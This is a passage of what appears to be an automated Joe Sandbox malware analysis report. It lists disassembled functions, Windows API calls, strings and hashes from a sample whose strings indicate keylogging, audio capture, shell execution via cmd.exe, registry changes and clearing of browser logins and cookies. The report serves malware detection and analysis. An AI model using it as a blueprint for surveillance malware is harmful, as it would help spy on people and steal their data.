                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                • String ID: Online Keylogger Started
                                                                                • API String ID: 112202259-1258561607
                                                                                • Opcode ID: 7af2f4e664a0f0d44fe55fdff72d15f713839edd46ab276ae2e5dde9f4d03b19
                                                                                • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                • Opcode Fuzzy Hash: 7af2f4e664a0f0d44fe55fdff72d15f713839edd46ab276ae2e5dde9f4d03b19
                                                                                • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                • String ID: `@
                                                                                • API String ID: 2583163307-951712118
                                                                                • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00784BAD
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00784BFB
                                                                                • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 00784C0E
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00784BC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$EventLocalThreadTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 2532271599-1507639952
                                                                                • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                • Instruction ID: 9b562db21fec8cca6fdada57641b5c8d733bb6876dce242800625f9c66268e84
                                                                                • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                • Instruction Fuzzy Hash: E011E3719052557BCB11BB7A980DBDB7FAC9B46360F004066F40542152DABCD485CBF6
                                                                                APIs
                                                                                  • Part of subcall function 0079B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0079A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079B3D3
                                                                                  • Part of subcall function 0079B3C2: IsWow64Process.KERNEL32(00000000,?,?,0079A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079B3DA
                                                                                  • Part of subcall function 0079277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0079279E
                                                                                  • Part of subcall function 0079277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 007927BB
                                                                                  • Part of subcall function 0079277A: RegCloseKey.ADVAPI32(?), ref: 007927C6
                                                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079A740
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                • String ID: (32 bit)$ (64 bit)$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 782494840-214125106
                                                                                • Opcode ID: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
                                                                                • Instruction ID: b784e9d5692df2cb723d196e66cab5cd70ea8e06a276570e1177822467df100f
                                                                                • Opcode Fuzzy Hash: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
                                                                                • Instruction Fuzzy Hash: 5311E560A40205A6DF05B3A4AC8FE6F766EDB80301F504539B516E32D3EB6C9E4783E6
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                • String ID: Connection Timeout
                                                                                • API String ID: 2055531096-499159329
                                                                                • Opcode ID: 3d68191a8eec2fc769f6dafcc38c8ce992fc9b892c09a3d72c981e2bf00c0901
                                                                                • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                • Opcode Fuzzy Hash: 3d68191a8eec2fc769f6dafcc38c8ce992fc9b892c09a3d72c981e2bf00c0901
                                                                                • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                APIs
                                                                                • waveInPrepareHeader.WINMM(006A4540,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                • waveInAddBuffer.WINMM(006A4540,00000020,?,00000000,00401913), ref: 0040175D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                • String ID: @Ej$`i
                                                                                • API String ID: 2315374483-1446255020
                                                                                • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                APIs
                                                                                • waveInPrepareHeader.WINMM(@Ej,00000020,00475BF4,00475BF4,00000000,00475B70,00473EE8,?,00000000,00781B7A), ref: 007819AE
                                                                                • waveInAddBuffer.WINMM(@Ej,00000020,?,00000000,00781B7A), ref: 007819C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                • String ID: @Ej$`i
                                                                                • API String ID: 2315374483-1446255020
                                                                                • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                • Instruction ID: e8009919869e4681af9e7de07d89636b5fe2d6d9380d468d4346a37cadcc5f18
                                                                                • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                • Instruction Fuzzy Hash: AF01D671701310AFD710AF28EC49E65BBB9FB49316B014539F509C3762EB35AC50DB58
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                • String ID: bad locale name
                                                                                • API String ID: 3628047217-1405518554
                                                                                • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 00792948
                                                                                • RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 00792970
                                                                                • RegCloseKey.ADVAPI32(004655B0,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,00787C44,00000001), ref: 0079297B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: Control Panel\Desktop
                                                                                • API String ID: 1818849710-27424756
                                                                                • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                • Instruction ID: e45f00c8b132aa62bd7a2d458f6af182d637be5ac8ddcb256f71829a2e4c358a
                                                                                • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                • Instruction Fuzzy Hash: 79F09072580108FBDF01AFA0EC59EEE776CEF00751F104264BA06A61A2EA35DE05DB50
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 00792A4A
                                                                                • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A65
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: TUF
                                                                                • API String ID: 1818849710-3431404234
                                                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                • Instruction ID: bd32a0e79821db95541d2b3ae4c1a1883ff7acc82deec1a9cf2175b8afae1505
                                                                                • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                • Instruction Fuzzy Hash: 53E06572540204BBDF21AFA0AC05FDB3BACEB04B95F004060FF05E6191D271CE04D794
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShell
                                                                                • String ID: /C $cmd.exe$open
                                                                                • API String ID: 587946157-3896048727
                                                                                • Opcode ID: 8a4566dbc6588db567efd5ebc16ae0e4f228da1b27707b98e933b39c794e7428
                                                                                • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                • Opcode Fuzzy Hash: 8a4566dbc6588db567efd5ebc16ae0e4f228da1b27707b98e933b39c794e7428
                                                                                • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                APIs
                                                                                • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 3123878439-4028850238
                                                                                • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __alldvrm$_strrchr
                                                                                • String ID:
                                                                                • API String ID: 1036877536-0
                                                                                • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                • Instruction ID: c10c3aea10faa5a019d7ae5d9407950959c9c9980adcf09c83222102cb8991c1
                                                                                • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                • Instruction Fuzzy Hash: C741E6B1B00704EFD7249F78C849FAA7BB9EB89710F10857EF502DB282D679A9518790
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3360349984-0
                                                                                • Opcode ID: 0229f6fa19d053722b7b0bd2de6bf031995136bd1ae29ad34a7eeab18cb6c5a8
                                                                                • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                • Opcode Fuzzy Hash: 0229f6fa19d053722b7b0bd2de6bf031995136bd1ae29ad34a7eeab18cb6c5a8
                                                                                • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 007849DF
                                                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 007849F3
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 007849FE
                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 00784A07
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3360349984-0
                                                                                • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                • Instruction ID: dae1844cad3be1e3fbb043f49e544813a4f9596ac2cdd30d216598fae4758dd6
                                                                                • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                • Instruction Fuzzy Hash: CC41B471684345EFC715FB24DD59D7FB7EDAF80311F000A1DF896C2292DA68E90A8762
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000006,?,00000000,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?), ref: 007D0187
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,00000006,?,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?,?), ref: 007D0210
                                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,00000006,00000001,?,?,?,00000002,?), ref: 007D0222
                                                                                • __freea.LIBCMT ref: 007D022B
                                                                                  • Part of subcall function 007C6D66: RtlAllocateHeap.NTDLL(00000000,007B468A,?), ref: 007C6D98
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                • String ID:
                                                                                • API String ID: 2652629310-0
                                                                                • Opcode ID: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
                                                                                • Instruction ID: 64c03d3e27be7ac5574ad859a2720fcb82dbf2aaa8ed190ff3fc01270d7c7a86
                                                                                • Opcode Fuzzy Hash: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
                                                                                • Instruction Fuzzy Hash: 2B31AD72A0120AABDB259FA4DC49EEE7BB5EF44710F04416AFC04D6251E739DD50CBA0
                                                                                APIs
                                                                                Strings
                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                • API String ID: 3472027048-1236744412
                                                                                • Opcode ID: 6c79a3abdf1ad97de70b2e63fddcf2f9fdc46bd72089c89cb8ac27af1688aa9f
                                                                                • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                • Opcode Fuzzy Hash: 6c79a3abdf1ad97de70b2e63fddcf2f9fdc46bd72089c89cb8ac27af1688aa9f
                                                                                • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                APIs
                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                • String ID: @CG$exepath$BG
                                                                                • API String ID: 4119054056-3221201242
                                                                                • Opcode ID: fd72609be73d1f1783dbf1d279e952d5808c6a47d3307a1485aff8893a4aba73
                                                                                • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                • Opcode Fuzzy Hash: fd72609be73d1f1783dbf1d279e952d5808c6a47d3307a1485aff8893a4aba73
                                                                                • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                APIs
                                                                                  • Part of subcall function 007928C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 007928E0
                                                                                  • Part of subcall function 007928C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 007928F9
                                                                                  • Part of subcall function 007928C4: RegCloseKey.ADVAPI32(?), ref: 00792904
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0079182A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                • String ID: @CG$exepath$BG
                                                                                • API String ID: 4119054056-3221201242
                                                                                • Opcode ID: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
